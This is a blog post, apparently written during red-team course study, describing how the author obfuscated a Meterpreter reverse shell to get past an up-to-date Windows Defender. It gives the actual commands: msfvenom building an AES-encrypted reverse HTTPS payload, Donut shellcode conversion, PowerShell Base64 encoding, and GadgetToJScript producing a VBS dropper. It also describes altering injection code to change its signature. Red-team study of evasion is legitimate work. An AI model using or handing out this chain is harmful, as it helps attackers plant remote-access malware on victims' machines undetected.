
Evasion: Bypassing AV through malware obfuscation techniques

When I was enrolled in PWK to obtain my OSCP, we students luckily did not have to bother with up-to-date antivirus software on the lab machines. Even though we learned some techniques to bypass UAC, bypassing AV software such as Windows Defender (installed by default on Windows 10) was kept a secret.

From a Red Teaming perspective, however, it is crucial to know how to bypass installed AV software, precisely because (as I've already written) Windows Defender is installed by default.

AV evasion is an ongoing game of cat-and-mouse: as new techniques are published, vendors usually add detections for them within a short amount of time.

I'm currently working my way through the Advanced Penetration Testing course from INE/eLearnSecurity (eCPTX), which introduces some techniques for AV evasion. I spent some time obfuscating a Meterpreter reverse shell and was able to bypass an up-to-date Windows 10 Defender (at the time of writing).

This isn't going to be an in-depth step-by-step guide; however, I'll mention which tools I used.

One note up front: I first intended to obfuscate a Covenant Grunt. It worked and I got a connection back from the compromised machine; however, the Grunt died a few seconds later. I tried to debug it, but was unsuccessful (it might be a Covenant bug).

I started by generating a reverse HTTPS Meterpreter shell (x64 architecture) and let msfvenom encrypt the payload with AES-256. Keep in mind that the decryption key necessarily ships inside the resulting binary, so this defeats static signatures rather than keeping the payload secret from anyone who has the file.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=eth0 lport=8443 exitfunc=thread -a x64 --encrypt aes256 --encrypt-key XmgTNffxyx5Rx6N6 -f exe -o httpsaes.exe

Right after that I used Donut to turn the generated binary into position-independent shellcode (-a 2 selects the amd64 loader):

donut.exe -a 2 httpsaes.exe

Before I could move on I had to convert the Donut-generated shellcode into Base64 using PowerShell, so that it can be embedded as a string in the C# payload:

# Path to the shellcode Donut wrote in the previous step
$shellcode = "C:\Users\Operator\Desktop\shellcode.bin"
# Read the raw bytes and write them out as a single Base64 line.
# Note: in Windows PowerShell 5.1 the > redirection (Out-File) writes UTF-16LE with a BOM;
# that is fine for pasting into Visual Studio, but tools expecting ASCII will need Set-Content -Encoding ASCII instead.
[Convert]::ToBase64String([IO.File]::ReadAllBytes($shellcode)) > base64.txt

Next up, I used GadgetToJScript to generate a VBS file, which gets executed on the target machine.

Download the repository and open it with Visual Studio. Once opened, open or create TestClass.cs within the TestPayload directory.

I used a process injection PoC found on GitHub, but any other process injection / shellcode execution technique should work fine too. I didn't just paste it into TestClass.cs as-is: I removed all comments, added some of my own and renamed several variables to change the signature of the code.

I compiled GadgetToJScript through Visual Studio. After that step I was able to generate the VBS (the output path is given without the extension; the tool appends it):

.\GadgetToJScript.exe -i .\..\..\..\..\TestPayload\TestClass.cs -r System.Core.dll -w vbs -o C:\Users\Operator\Desktop\evaded

Figure: Proof-of-Concept demonstration

This post is licensed under CC BY 4.0 by the author.